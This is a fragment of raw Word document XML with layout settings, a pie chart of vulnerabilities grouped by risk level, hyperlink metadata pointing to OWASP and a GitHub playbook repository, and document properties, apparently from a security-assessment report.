                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="128668479">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="171645500">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="457341025">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="530383836">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="751700726">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="764348003">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="820847145">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="908464038">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1117721912">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1251307232">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1389525058">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="15849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82957">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2107342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evaarcen/RADAR/tree/master/radar/playbook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me-domain.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owasp.org/www-project-top-ten/"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Distribution of Vulneabilities </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>By Risk</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explosion val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="92D050"/>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2-FD51-42AF-AB05-E989CAD9B1D5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:bubble3D val="0"/>
            <c:explosion val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="C00000"/>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FD51-42AF-AB05-E989CAD9B1D5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:bubble3D val="0"/>
            <c:explosion val="9"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FFC000"/>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FD51-42AF-AB05-E989CAD9B1D5}"/>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D659-4F32-A8BF-8268A7A8526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Low</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>High - Critical</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Med</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>3.2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>3</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-FD51-42AF-AB05-E989CAD9B1D5}"/>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legendEntry>
        <c:idx val="3"/>
        <c:delete val="1"/>
      </c:legendEntry>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949CB-E4AE-4E79-8705-8B325ED4F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44</Pages>
  <Words>8165</Words>
  <Characters>46547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54603</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="198" baseType="variant">
      <vt:variant>
        <vt:i4>6422566</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>192</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://owasp.org/www-project-top-ten/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2293798</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>189</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://github.com/Sevaarcen/RADAR/tree/master/radar/playbooks</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048637</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>183</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321920</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>177</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321919</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>171</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321918</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>165</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321917</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>159</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321916</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>153</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321915</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>147</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321914</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>141</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321913</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>135</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321912</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>129</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321911</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245245</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>123</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321910</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>117</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321909</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>110</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321908</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>104</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321907</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>98</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321906</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>92</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321905</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>86</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321904</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>80</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321903</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>74</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321902</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>68</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321901</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179709</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321900</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>56</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321899</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>50</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321898</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>44</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321897</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>38</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321896</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321895</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321894</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321893</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321892</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321891</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc177321890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نصر الدين السيد حسن</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>محمد نصر الدين السيد حسن</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <cp:lastPrinted>2024-09-29T07:44:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-29T07:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-29T07:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>